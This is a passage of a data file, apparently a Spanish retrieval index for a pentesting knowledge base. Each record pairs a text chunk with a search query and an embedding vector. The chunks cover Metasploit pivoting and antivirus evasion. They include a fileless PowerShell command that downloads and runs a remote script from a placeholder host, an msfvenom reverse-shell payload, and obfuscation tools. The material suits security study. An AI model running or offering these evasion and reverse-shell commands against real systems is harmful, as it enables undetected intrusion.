-0.02747, -0.01243, 0.06009, -0.02903, 0.03346, -0.0024, 0.06787, 0.06252, -0.01068, 0.08713, 0.02177, -0.07148, -0.0194, -0.01942, -0.02005, -0.08688, 0.00505, -0.03459, 0.00465, -0.0133, 0.04952, 0.02063, -0.0151, -0.04208, -0.00888, 0.02276, 0.01225, 0.01691, -0.05046, 0.04093, 0.03243, 0.02884, 0.0434, -0.02198, 0.01163, -0.04007, -0.00298, -0.05538, -0.04582, 0.00717, -0.02437, -0.01339, 0.05106, 0.00082, -0.02358, 0.05086, 0.07165, 0.13225, 0.00327, -0.07213, 0.03647, -0.01473, -0.03944, 0.00624, 0.00564, 0.04185, -0.02109, 0.03155, -0.00705, 0.02428, 0.02382, 0.06074, 0.01219, -0.03721, 0.01613, -0.02278, 0.03295, 0.04035, 0.02651, -0.02404, -0.01683, -0.03549, -0.00216, 0.00349, 0.01769, 0.02716, 0.00801, -0.00171, -0.01949, 0.07095, 0.00438, -0.01541, 0.00543, -0.00103, -0.0423, 0.02249, 0.0302, -0.01693, -0.02012, 0.03288, -0.0262, -0.09549, 0.00252, 0.0495]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Pivoting con Metasploit\n```\nuse post/multi/manage/autoroute\nset SESSION 1 ; set SUBNET 192.168.5.0 ; run\nuse auxiliary/server/socks_proxy ; run # + proxychains β†’ Tunneling\nportfwd add -l 3389 -p 3389 -r 192.168.5.10\n```\n\nRelacionado: Buffer Overflow Β· Reverse shell Β· Reglas de herramientas Β· OSCP MOC", "indexar": "con quΓ© herramienta puedo redirigir trΓ‘fico a travΓ©s de puertos personalizados", "v": [-0.0073, 0.04053, -0.15996, -0.1477, 0.12809, 0.00538, 0.17087, -0.03761, -0.05992, -0.13065, 0.04234, 0.03611, 0.08533, -0.07999, 0.05522, -0.02308, 0.04522, -0.0592, 0.05047, -0.02033, -0.01298, -0.03528, -0.10149, -0.13557, 0.03016, -0.12478, 0.06825, -0.05768, -0.2196, 0.07331, -0.05984, 0.05369, 0.15664, -0.10004, -0.06134, -0.17322, -0.05472, 0.11031, 0.11022, -0.09579, 0.06782, -0.00084, -0.05601, -0.01185, 0.11234, -0.02701, -0.08026, -0.08966, 0.00877, -0.05446, -0.03619, -0.13338, -0.13185, -0.03121, -0.01472, -0.07025, 0.15598, -0.04816, 0.04615, -0.11484, 0.02691, 0.06948, -0.04384, -0.04392, 0.03175, -0.11171, 0.01457, 0.02436, -0.10652, 0.04674, -0.03358, 0.00936, 0.01937, 0.12903, 0.03527, -0.04297, 0.0182, 0.13815, 0.08437, 0.02005, 0.1072, 0.01577, -0.07142, -0.04557, -0.0021, -0.06685, -0.07199, -0.05054, 0.05901, -0.0884, -0.029, -0.03165, 0.01886, 0.0758, -0.05862, 0.05996, -0.04486, -0.05221, -0.05205, -0.01411, 0.16143, 0.06296, -0.08729, 0.00797, 0.00219, 0.00608, -0.02198, -0.09769, 0.07278, 0.0512, 0.05339, 0.05292, 0.04164, -0.02047, 0.03104, 0.08, -0.03543, -0.07616, -0.02064, -0.06314, 0.0209, -0.03662, -0.04191, -0.06094, -0.00219, 0.05396, -0.00694, 0.16981, -0.02591, -0.07764, 0.06358, -0.02882, -0.09827, -0.0719, -0.05912, -0.02221, -0.01858, -0.12711, -0.01192, 0.00808, -0.05456, -0.04073, -0.02849, -0.0506, 0.02444, -0.00185, -0.03247, -0.04805, -0.06227, -0.05503, 0.05772, -0.0323, 0.01183, -0.00244, -0.01252, 0.03304, 0.02991, -0.02337, -0.06531, 0.02411, -0.04739, 0.03498, -0.00921, 0.02364, 0.07307, 0.00708, 0.00867, 0.04151, 0.00254, 0.03854, -0.02738, 0.02169, 0.03276, -0.06505, -0.00621, -0.04525, -0.11612, -0.05237, -0.06606, -0.06511, -0.0564, -0.01556, -0.05303, -0.04787, -0.02641, -0.09729, -0.053, -0.01427, 0.0385, 0.04668, -0.05254, 0.0434, -0.0187, -0.03926, -0.02075, 0.04893, -0.01216, -0.02303, 0.01877, -0.00061, 0.03273, -0.00448, 0.07068, -0.06045, -0.01454, 0.06845, -0.06459, 0.00669, 0.04037, 0.05038, 0.0119, -0.03075, 0.03435, -0.00626, -0.00173, 0.01638, -0.04066, 0.01416, 0.02469, 0.08678, -0.01433, 0.01894, -0.02453, 0.01316, -0.02243, 0.04286, 0.02565, 0.04639, 0.02315, 0.04115, 0.04711, -0.0124, -0.04295, -0.07012, 0.02407, 0.00822, -0.03602, -0.02785, -0.06433, -0.04049, 0.01559, 0.00922, -0.00028, -0.04208, 1e-05, -0.04167, -0.00235, -0.02464, -0.02105, -0.02346, -0.04161, 0.05667, 0.01516, -0.03872, 0.03792, -0.06441]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# AV evasion\n\n> Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.", "indexar": "que programa sirve para evadir los antivirus tocando disco", "v": [-0.04094, -0.05979, -0.25588, -0.0763, -0.04038, -0.01445, -0.0042, -0.0652, -0.05299, -0.06699, 0.08992, -0.2364, -0.08526, -0.03893, 0.074, -0.06524, 0.17622, -0.06277, 0.12637, 0.09256, 0.01374, -0.03092, -0.064, -0.03101, 0.07405, 0.03399, -0.10399, 0.09534, -0.04011, 0.09781, 0.00577, 0.00029, 0.02685, -0.12924, -0.02411, -0.03018, -0.00594, -0.06148, 0.10411, 0.03741, 0.10407, 0.00448, -0.02714, 0.00184, -0.0117, -0.08906, 0.12948, -0.05837, 0.05012, 0.05589, -0.06724, 0.07109, 0.0078, -0.03777, 0.01077, -0.18648, -0.1389, -0.12159, 0.04386, 0.05447, -0.08617, 0.02212, -0.01438, 0.05395, 0.05094, 0.03249, 0.09569, -0.14663, -0.02763, 0.05735, -0.13409, 0.12241, 0.10043, -0.07857, -0.03813, -0.08578, -0.01567, -0.04686, 0.03254, -0.09382, -0.03267, -0.0078, 0.08687, 0.01759, -0.19378, -0.02912, 0.04996, 0.03017, -0.04977, 0.01706, -0.03432, 0.0476, -0.04172, 0.08345, 0.09915, -0.05161, 0.11135, 0.11575, 0.05804, 0.00261, 0.09333, -0.03071, -0.07879, 0.04759, -0.03256, -0.01847, 0.06059, -0.03296, -0.01888, 0.11629, 0.01619, 0.03276, -0.02407, -0.05977, -0.02234, -0.04912, 0.02057, 0.00119, 0.02423, 0.00926, -0.04967, 0.07162, -0.09215, 0.03346, 0.08037, -0.00618, -0.0029, 0.08647, -0.08314, 0.05831, 0.06051, -0.05862, -0.01326, 0.03055, -0.05904, -0.01334, 0.01785, -0.03855, 0.00542, -0.00287, 0.10903, 0.12038, -0.01278, 0.06075, 0.02349, -0.00537, 0.07008, -0.01241, -0.00037, 0.04015, 0.04023, 0.05241, -0.07394, 0.03431, -0.05881, 0.0402, -0.02492, -0.01414, -0.02435, -0.03782, 0.02119, 0.00507, -7e-05, -0.03787, -0.02091, -0.02505, 0.03089, -0.02328, 0.06656, 0.12671, -0.04121, 0.04605, 0.085, -0.09359, -0.06409, -0.04569, 0.00266, -0.09267, 0.04449, 0.02082, 0.01131, -0.00251, 0.01801, -0.03224, 0.00011, -0.02173, -0.00511, 0.02309, 0.01055, -0.00311, 0.01299, -0.02777, -0.06326, 0.01011, -0.02097, -0.04863, -0.04392, -0.03044, -0.01276, 0.03365, -0.04932, -0.04846, -0.02969, -0.02118, 0.08212, 0.11363, 0.009, -0.02168, 0.04728, 0.04807, 0.01673, 0.00243, -0.01355, 0.07873, 0.00581, -0.05187, -0.00397, 0.0654, 0.03561, 0.0474, -0.02748, 0.00759, 0.078, -0.05227, -0.03885, -0.03571, 0.02227, -0.00668, 0.08921, 0.00704, -0.00065, -0.0329, 0.01057, -0.01715, -0.01206, 0.01326, -0.01251, -0.02632, -0.03705, -0.04079, -0.03054, 0.01989, 0.01557, -0.09289, -0.01408, -0.02115, -0.00665, 0.0162, 0.01055, -0.0001, -0.03714, 0.01156, -0.03042, 0.03931, 0.03704, 0.06618]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# AV evasion\n\n> Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.", "indexar": "con que puedo montar un payload que no sea detectado por el antivirus", "v": [0.16493, 0.11932, -0.23373, -0.08819, -0.09282, 0.09201, 0.03231, 0.03924, -0.18907, -0.01894, 0.02176, -0.04874, -0.02791, 0.06617, 0.0095, 0.05045, -0.06044, -0.04842, 0.02243, 0.0564, -0.00279, -0.09381, 0.01827, -0.04543, 0.06702, 0.19585, -0.04546, 0.03444, -0.17576, -0.0224, -0.02172, 0.09274, 0.05041, 0.05357, -0.03988, -0.0341, -0.03724, 0.02774, 0.05538, 0.06545, 0.06361, 0.01419, -0.10487, 0.03781, 0.05835, 0.00022, -0.00271, -0.12069, 0.06854, -0.04256, 0.05823, 0.04633, -0.07767, 0.0305, -0.05125, -0.0761, 0.12286, 0.02505, 0.12351, -0.06693, -0.08488, 0.18402, -0.03023, 0.04466, -0.01629, -0.04183, 0.00855, 0.04381, -0.08635, -0.09834, 0.04256, -0.05359, -0.00025, 0.01708, -0.02082, -0.00369, -0.02866, 0.01818, 0.10872, 0.0484, 0.05748, 0.00577, 0.04871, 0.02252, -0.10194, -0.09426, 0.02674, -0.03399, -0.01281, -0.127, 0.041, 0.06561, -0.07549, 0.1318, 0.00228, -0.03683, 0.14954, 0.00514, 0.00494, 0.04225, 0.03066, 0.01917, 0.01467, 0.13289, 0.09821, -0.02837, 0.00723, -0.06316, 0.04096, -0.06356, 0.03666, -0.0608, -0.01036, -0.00851, -0.08216, -0.11608, 0.01534, 0.02806, 0.01613, -0.00332, -0.03315, 0.00041, -0.01351, 0.05136, 0.06578, -0.10591, -0.03748, 0.14794, -0.0086, -0.01152, -0.01103, 0.00244, -0.02632, -0.01066, -0.07736, 0.05768, -0.01247, -0.0756, -0.07734, 0.0723, 0.04749, 0.07407, 0.06465, 0.02754, 0.016, 0.04385, -0.02779, -0.06386, -0.10108, 0.03942, 0.0903, 0.09146, -0.01815, 0.03662, -0.0719, 0.03696, 0.08852, -0.01846, 0.05526, 0.02667, 0.01202, 0.08669, -0.02246, 0.02082, 0.00946, -0.02346, -0.02239, -0.00558, 0.02465, 0.08928, -0.03369, 0.03228, -0.02538, -0.06043, 0.01845, -0.03108, -0.00617, -0.06899, 0.05936, -0.02921, -0.0734, 0.01596, -0.01262, 0.01454, -0.03999, -0.05858, 0.00611, 0.02003, 0.02336, 0.03143, 0.04199, 0.02676, -0.02252, 0.01912, -0.01904, -0.09494, -0.03865, 0.00433, 0.08576, 0.02461, 0.00739, -0.066, -0.06544, -0.01572, -0.01739, -0.04219, -0.05237, 0.05859, 0.07486, 0.05388, 0.08371, -0.06269, 0.05689, -0.07226, -0.06347, -0.01618, -0.02411, -0.02679, -0.01378, 0.05539, 0.01555, 0.03457, 0.10933, -0.06329, -0.0293, 0.00744, 0.01338, 0.04283, 0.15087, 0.02891, -0.01617, 0.03276, -0.01832, -0.05102, -0.00907, 0.01496, 0.01301, -0.03344, -0.06254, 0.01896, 0.02484, 0.02149, 0.02099, -0.1181, -0.05239, -0.05973, -0.03916, 0.04923, 0.01633, -0.02805, -0.0404, 0.09104, 0.02005, -0.02753, 0.03625, -0.02596]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## PowerShell en memoria (no toca disco)\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless\npowershell -ExecutionPolicy Bypass -File evasion.ps1\npowershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)\n```", "indexar": "que programa puedo ejecutar sin guardarlo en el disco?", "v": [-0.02694, 0.00201, -0.23191, -0.03459, -0.03311, -0.05449, 0.03083, -0.01629, -0.11212, -0.12794, 0.00915, -0.07182, -0.10145, -0.13012, 0.01044, 0.01859, 0.12045, 0.0167, -0.04217, 0.00408, 0.01105, -0.009, 0.06361, -0.05037, 0.03389, -0.00024, -0.02951, 0.01288, -0.12721, 0.01733, 0.01269, -0.01299, 0.07114, -0.20477, 0.08594, -0.02343, 0.0767, -0.00911, 0.03958, 0.02837, 0.00468, 0.08475, -0.01543, 0.10849, -0.02753, -0.06733, 0.18494, -0.02908, 0.03824, -0.03495, 0.03863, 0.05315, -0.0373, -0.04754, 0.04831, -0.20223, -0.02784, -0.04623, 0.06393, 0.07387, 0.00409, 0.03125, 0.07273, 0.08873, 0.13268, 0.05267, 0.05855, -0.06598, -0.04691, 0.09772, -0.17146, 0.08566, 0.11197, 0.02736, -1e-05, -0.03767, 0.03688, -0.01716, -0.00215, -0.03952, -0.09952, -0.03892, 0.06403, 0.03677, -0.13305, -0.08674, 0.01969, -0.03686, 0.01251, -0.01136, 0.02212, -0.00725, -0.06593, 0.09787, 0.05842, 0.00248, 0.13753, 0.12462, 0.00832, 0.03288, 0.10421, -0.01958, -0.0651, 0.03542, 0.05927, 0.10707, 0.06886, 0.00422, 0.03142, 0.13535, 0.02759, 0.02948, -0.02592, -0.11416, -0.05838, -0.00484, 0.00361, 0.00682, 0.00817, 0.03143, -0.09281, 0.06567, -0.104, 0.04306, 0.15115, -0.0204, 0.03988, 0.09545, -0.13166, 0.08258, 0.00452, 0.01765, -0.01637, -0.02601, 0.00024, -0.03035, -0.06081, -0.01795, 0.05368, -0.08396, 0.09344, 0.06104, -0.03835, 0.03248, 0.03321, -1e-05, 0.00357, 0.00504, -0.04024, 0.0037, 0.06507, 0.05666, -0.05279, 0.04899, -0.09256, -0.0001, 0.07111, -0.06792, 0.01594, -0.00763, 0.03518, 0.01978, -0.02348, -0.04838, 0.02943, -0.00506, 0.02787, -0.02019, 0.03121, 0.08991, -0.05935, 0.02102, 0.04969, -0.06499, -0.0097, -0.10731, -0.04518, -0.06909, 0.1036, 0.03636, -0.08872, 0.02566, -0.0136, -0.01977, -0.02223, -0.06465, -0.00465, 0.034, -0.0224, 0.00608, 0.05801, 0.0091, 0.00956, -0.01852, -0.01244, -0.0312, -0.03421, 0.0313, -0.02495, 0.03508, -0.07754, -0.07966, 0.00738, -0.00658, 0.04794, 0.04668, -0.09846, 0.06329, -0.01568, 0.0637, 0.012, -0.04547, 0.05464, 0.00494, -0.03526, -0.05062, 0.00788, 0.09309, 0.01469, 0.07005, -0.02892, 0.02012, 0.09313, -0.03258, -0.02585, -0.0808, 0.01024, 0.04894, 0.07403, 0.03636, -0.02662, -0.02578, -0.00846, 0.00917, 0.06806, 0.00301, -0.01241, -0.05067, -0.02286, -0.09137, 0.01527, 0.09636, -0.01213, -0.05784, -0.01457, -0.00501, -0.05657, 0.03021, -0.01198, -0.04299, 0.01784, 0.03739, 0.03048, -0.07346, 0.04489, 0.0327]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## PowerShell en memoria (no toca disco)\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless\npowershell -ExecutionPolicy Bypass -File evasion.ps1\npowershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)\n```", "indexar": "cual es una alternativa libre a PowerShell para ejecutar scripts sin tocar disco?", "v": [-0.02651, -0.07529, -0.20707, -0.01231, -0.06879, -0.13539, -0.06208, -0.03219, 0.04795, -0.00847, -0.05578, -0.06655, -0.03862, -0.09044, 0.10495, -0.07791, 0.05474, -0.06574, 0.07259, 0.02048, -0.055, -0.05303, -0.07372, -0.05172, 0.03962, -0.09716, -0.05042, 0.12868, -0.21216, -0.01575, -0.00984, -0.02533, 0.06855, -0.15805, 0.04955, -0.02368, 0.06232, 0.03547, 0.21593, 0.15988, -0.06148, 0.05707, -0.09836, 0.08466, -0.03969, -0.09505, 0.08351, -0.01273, 0.04128, -0.02014, 0.02173, 0.04158, -0.13132, -0.02767, 0.05147, -0.08475, 0.06368, -0.16889, -0.04868, 0.10137, -0.07288, 0.00308, 0.03927, 0.03052, 0.09667, 0.06345, 0.01174, -0.18589, -0.00297, 0.15682, -0.07953, 0.03555, 0.04518, 0.01712, 0.01716, 0.0086, -0.02136, -0.09752, -0.04281, -0.01293, -0.02192, -0.09844, -0.04187, 0.04026, -0.12122, -0.0426, -0.0062, -0.09757, -0.07526, 0.03307, 0.13824, 0.00434, -0.07269, 0.11567, 0.07247, -0.05786, 0.05947, 0.10031, 0.02265, 0.01157, 0.05438, -0.02219, -0.08973, -0.02843, 0.11078, 0.03596, 0.03515, 0.03139, -0.0055, 0.09201, -0.01017, 0.10408, 0.04949, -0.01006, 0.01337, -0.02295, -0.03619, -0.03533, -0.02926, 0.02319, -0.03283, 0.04943, -0.06916, -0.07255, 0.03346, 0.03943, 0.06492, -0.01814, -0.04506, 0.04932, 0.03683, -0.06309, -0.00885, -0.07911, -0.04746, 0.06038, 0.05142, 0.00949, -0.0305, -0.07491, 0.10125, 0.09043, 0.00385, 0.03089, 0.06745, -0.04751, -0.01073, 0.0224, 0.00665, 0.01772, -0.0173, 0.07006, -0.03798, 0.10487, -0.0255, -0.05838, 0.01203, 0.02805, -0.0756, 0.00265, 0.04809, -0.0164, -0.04557, 0.01808, -0.0273, 0.00928, -0.03535, -0.02835, -0.01229, 0.05323, -0.02115, 0.06609, 0.10793, -0.00083, 0.03817, -0.11852, -0.01288, -0.08029, 0.01692, -0.0015, 0.02734, -0.00068, -0.0831, -0.05434, -0.02399, 0.00579, -0.00162, -0.02746, -0.01449, 0.03178, 0.01805, -0.00047, -0.04579, -0.11124, 0.02498, -0.01274, 0.01881, -0.04527, -0.09219, 0.00801, -0.07672, -0.02487, -0.01788, -0.02515, 0.0663, 0.02368, -0.03688, 0.02637, -0.04994, -0.03111, 0.06154, 0.02284, 0.07135, 0.05144, -0.02878, -0.04585, 0.02963, 0.04012, -0.00051, 0.05698, -0.02262, 0.02927, 0.08486, -0.06342, -0.01418, 0.0185, 0.03708, 0.01084, 0.00377, 0.06669, 0.03785, 0.02021, -0.03068, 0.05249, 0.00621, -0.01204, -0.03104, 0.00198, -0.03749, -0.02797, 0.01808, 0.04361, -0.00341, -0.0622, -0.04007, -0.00467, -0.09371, -0.0415, -0.03833, -0.02696, 0.01537, 0.02724, 0.04544, -0.01493, 0.03515, 0.02806]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## PowerShell en memoria (no toca disco)\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless\npowershell -ExecutionPolicy Bypass -File evasion.ps1\npowershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)\n```", "indexar": "con que herramienta monto un ataque por memoria usando base64?", "v": [0.05532, 0.04593, -0.21329, -0.12069, -0.15399, -0.06716, -0.09975, -0.04846, -0.0971, -0.10377, -0.0127, 0.08255, 0.01422, -0.00324, -0.00415, -0.03981, 0.08818, -0.06157, -0.11104, -0.1349, -0.05785, -0.07083, 0.00624, -0.02962, -0.07971, 0.0574, -0.06104, -0.0636, -0.08335, -0.03141, 0.10852, -0.02099, -0.01201, -0.00088, -0.08609, -0.09167, -0.06617, 0.04264, -0.00568, 0.05986, -0.00311, 0.06083, -0.22026, 0.17554, 0.01833, -0.04392, 0.02837, 0.03473, 0.11554, -0.03056, 0.01661, -0.11981, -0.15447, -0.05149, -0.02978, -0.20472, 0.10653, -0.05623, 0.04484, 0.01477, -0.11349, 0.03568, 0.05727, -0.0196, 0.03703, -0.03184, 0.02181, -0.00802, -0.12084, 0.064, -0.09137, 0.07783, -0.0703, 0.01796, 0.06613, 0.05002, 0.13468, 0.03349, 0.02376, 0.02934, -0.11839, -0.01822, -0.06519, 0.00511, -0.08477, -0.03759, 0.096, -0.05845, 0.02225, -0.06797, 0.06754, 0.02984, -0.0358, 0.05673, -0.01488, -0.02816, 0.06571, 0.02202, 0.02521, 0.01509, 0.06068, -0.1014, -0.02536, 0.01827, 0.11782, -0.00269, 0.03658, -0.08402, -0.09335, -0.04723, -0.00154, 0.06013, -0.03372, 0.01588, 0.02726, -0.02928, -0.02157, 0.0049, 0.06176, -0.06518, 0.01589, 0.06759, -0.06032, 0.01575, 0.00851, -0.0351, -0.06393, 0.01497, -0.10636, -0.04678, 0.00279, 0.02967, 0.0081, -0.00384, -0.05352, 0.09311, 0.04369, -0.08162, -0.02184, -0.05783, 0.07317, 0.07881, -0.07192, -0.0521, 0.05364, 0.13881, 0.08872, 0.00329, -0.14045, 0.01877, 0.06306, 0.01432, 0.03378, 0.02069, -0.0602, -0.0106, 0.01155, 0.01857, -0.08998, 0.05437, -0.10302, 0.00486, -0.00347, 0.05308, -0.04057, -0.10489, 0.01921, -0.03805, 0.04081, 0.0521, 0.02355, 0.03062, 0.01142, -0.01051, -0.03051, -0.10377, -0.12748, -0.00255, 0.01392, 0.00313, -0.01383, -0.0394, 0.01977, 0.01367, -0.02071, -0.08864, 0.00937, 0.00889, 0.0234, -0.00719, -0.00032, -0.0264, -0.01993, -0.00321, -0.02117, -0.05385, -0.02576, 0.00216, 0.05705, -0.01594, -0.02738, 0.05055, -0.07966, -0.0042, 0.02505, 0.04655, 0.00657, -0.012, -0.06985, 0.10659, 0.00249, -0.01557, 0.00415, -0.00981, -0.04161, 0.02274, 0.05042, -0.0053, -0.02566, -0.05292, 0.07549, 0.0194, 0.0244, 0.00254, -0.05144, 0.05898, -0.0107, 0.00321, 0.0135, -0.0499, -0.0948, -0.0159, -0.05456, -0.01014, 0.01191, -0.09301, -0.00562, 0.03062, -0.06578, -0.03074, 0.0283, 0.01119, -0.06334, -0.02659, -0.04867, -0.06932, -0.02698, 0.05809, 0.00681, -0.07237, -0.00753, 0.05137, 0.06652, -0.01997, -0.02296, -0.02049]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Generar y ofuscar\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ msfvenom\npython3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation\n./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables\n```", "indexar": "con que puedo generar y ofuscar un script de PowerShell", "v": [-0.10259, -0.11419, -0.03235, -0.01558, -0.09, -0.0651, -0.02441, 0.01601, 0.0922, -0.0931, -0.16863, 0.09837, -0.04186, -0.07112, -0.07125, 0.11116, -0.06521, -0.09218, -0.06683, 0.13394, 0.0177, -0.0065, -0.12261, -0.17049, -0.02686, 0.06992, -0.0243, 0.05775, -0.18433, -0.00693, -0.00432, 0.06978, 0.0181, -0.15754, -0.08898, 0.01038, -0.08116, 0.20414, 0.11252, 0.2142, -0.11351, 0.09958, -0.03963, 0.03613, -0.01767, -0.01811, -0.02449, -0.1034, -0.03361, -0.05975, -0.00781, -0.10513, -0.12396, -0.02911, 0.02265, 0.04754, -0.015, -0.17362, -0.10435, 0.04865, -0.02304, 0.09079, -0.05415, 0.05394, -0.03474, 0.02479, -0.08229, -0.10776, -0.09251, 0.05035, -0.06796, 0.01165, -0.04914, -0.06534, 0.11516, 0.04482, -0.06236, -0.00411, -0.05502, 0.00618, -0.04566, -0.03186, -0.04024, 0.08984, -0.01329, 0.00757, -0.04194, -0.1099, -0.04821, -0.04644, 0.10679, 0.04615, 0.00433, 0.10946, 0.0002, -0.00128, 0.0046, 0.05786, -0.02368, -0.0404, -0.04885, -0.09483, -0.08598, 0.05269, 0.08935, 0.01593, 0.08367, 0.03847, 0.04126, -0.02946, -0.01022, 0.01993, 0.03661, 0.03751, -0.07688, 0.00329, -0.08547, -0.04323, 0.02419, -0.04136, -0.01018, 0.01868, -0.00178, 0.00756, 0.00482, 0.01514, -0.00374, 0.0036, 0.04754, 0.01339, -0.02794, -0.00411, -0.00943, -0.09834, -0.0345, 0.00389, -0.0366, 0.03551, -0.03868, -0.05106, 0.05151, 0.11335, 0.04871, -0.00519, -0.01615, -0.14154, -0.11035, -0.03747, 0.02446, -0.0105, -0.01235, 0.07029, 0.02789, 0.08514, -0.04878, -0.01754, 0.06441, 0.01281, -0.00362, -0.04256, -0.077, -0.00177, -0.02817, 0.07089, 0.00434, -0.03301, -0.14849, -0.06267, 0.00853, 0.00692, 0.0115, 0.03625, 0.0419, -0.0345, 0.0337, -0.05355, 0.00266, -0.06345, -0.12671, -0.0531, -0.01466, -0.01909, -0.07261, -0.01193, -0.05065, 0.0699, 0.00511, -0.03454, 0.00451, 0.03268, -0.01897, 0.01932, 0.02475, -0.10833, 0.02726, -0.02664, 0.04418, 0.02422, 0.00316, -0.03889, -0.04922, 0.0075, -0.05738, -0.00362, 0.05387, -0.01951, -0.0279, 0.04763, -0.03632, -0.07955, 0.12349, 0.00169, 0.11088, 0.01359, -0.07839, -0.00218, 0.03337, -0.02315, 0.00531, 0.04591, 0.02014, 0.02531, 0.02242, 0.02072, 0.05108, 0.01585, 0.04209, -0.00578, -0.01676, 0.05454, -0.01876, 0.01938, -0.06198, -0.01567, 0.03932, 0.02296, -0.00736, -0.00678, -0.05683, 0.01019, -0.01427, 0.02939, 0.02887, -0.03951, -0.04945, -0.02645, -0.06256, 0.00672, -0.00766, -0.01522, -0.00411, -0.02339, 0.02747, -0.01102, 0.05797, -0.02855]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Generar y ofuscar\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ msfvenom\npython3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation\n./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables\n```", "indexar": "que herramienta me sirve para obfuscar cadenas de texto en cΓ³digo", "v": [0.00161, -0.07787, -0.11611, -0.14741, -0.06689, -0.2359, -0.09792, 0.04714, 0.03725, -0.03513, -0.10149, -0.11491, -0.05992, -0.1682, 0.04987, 0.0785, 0.12345, -0.07835, 0.11698, 0.01986, 0.02486, -0.10603, -0.11447, -0.13023, -0.06788, -0.0332, 0.02814, -0.03408, -0.2438, -0.00351, -0.03002, 0.03875, 0.12313, 0.00262, -0.14191, 0.04872, 0.00792, 0.09398, -0.1006, 0.11041, -0.06189, 0.12252, -0.05698, -0.01596, -0.01702, -0.02155, -0.00474, 0.12788, -0.03672, 0.06158, -0.082, -0.21587, -0.15338, -0.01609, -0.07802, -0.04647, 0.15866, -0.04915, -0.04865, 0.02244, 0.06139, -0.10872, 0.01524, -0.11783, -0.00989, 0.0403, 0.05343, 0.03745, -0.09388, 0.00945, -0.03324, 0.06693, -0.03948, -0.00137, 0.00481, 0.03031, -0.02766, -0.0419, 0.06569, 0.10068, 0.03501, -0.00915, -0.04691, 0.0456, 0.08835, -0.01349, 0.03333, -0.03752, 0.03288, -0.10091, 0.06849, 0.01939, 0.01463, 0.02583, 0.05055, 0.07064, 0.02582, -0.03338, 0.05043, 0.06973, 0.13414, -0.0742, -0.02641, -0.0231, 0.11739, 0.05454, -0.0219, -0.00661, 0.01374, -0.00744, 0.04478, -0.00962, -0.0276, -0.01184, -0.10369, 0.05682, 0.00077, -0.01738, -0.00027, -0.0229, -0.05422, 0.04538, -0.07978, -0.00765, 0.00948, 0.06832, -0.01184, 0.07364, -0.04025, -0.07991, -0.11788, -0.03061, -0.05123, -0.03267, 0.01118, -0.06256, 0.07244, -0.05477, -0.00305, -0.02024, 0.00024, 0.01553, -0.044, 0.09447, 0.02926, 0.02893, 0.01701, -0.09017, 0.00154, -0.02723, -0.03908, -0.00824, 0.0053, -0.03783, -0.0038, 0.00256, 0.02693, 0.00684, -0.06086, 0.02957, -0.02742, -0.10766, 0.01251, 0.00012, 0.02866, -0.03542, -0.04813, 0.0046, 0.03784, 0.04448, 0.03093, -0.00107, 0.12055, -0.04699, 0.05315, -0.02555, -0.02382, 0.02229, -0.11059, -0.07875, -0.01446, 0.02441, 0.00359, -0.03687, 0.03742, -0.02737, 0.01257, 0.01685, -0.00603, -0.00012, -0.01037, 0.02425, 0.02398, -0.02908, -0.02962, 0.03526, -0.00764, -0.03492, 0.01682, -0.08878, -0.05842, 0.0076, -0.014, -0.06007, 0.04459, 0.07496, -0.01077, -0.03443, -0.01188, 0.07969, 0.06499, -0.0024, 0.03565, -0.00766, -0.00786, -0.0408, 0.02212, 0.08853, 0.03774, 0.00785, 0.01414, -0.00034, 0.01023, 0.01186, 0.00206, 0.00757, -0.01777, 0.04578, -0.01237, -0.02797, 0.02952, -0.07008, -0.05542, 0.02452, 0.02782, -0.06184, -0.02189, 0.0178, -0.05946, -0.05741, -0.04687, 0.04096, -0.04705, -0.00157, 0.0013, -0.01552, -0.05014, -0.03355, -0.05317, -0.01327, -0.05501, -0.06642, 0.02272, -0.06745, 0.035, -0.03643]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": 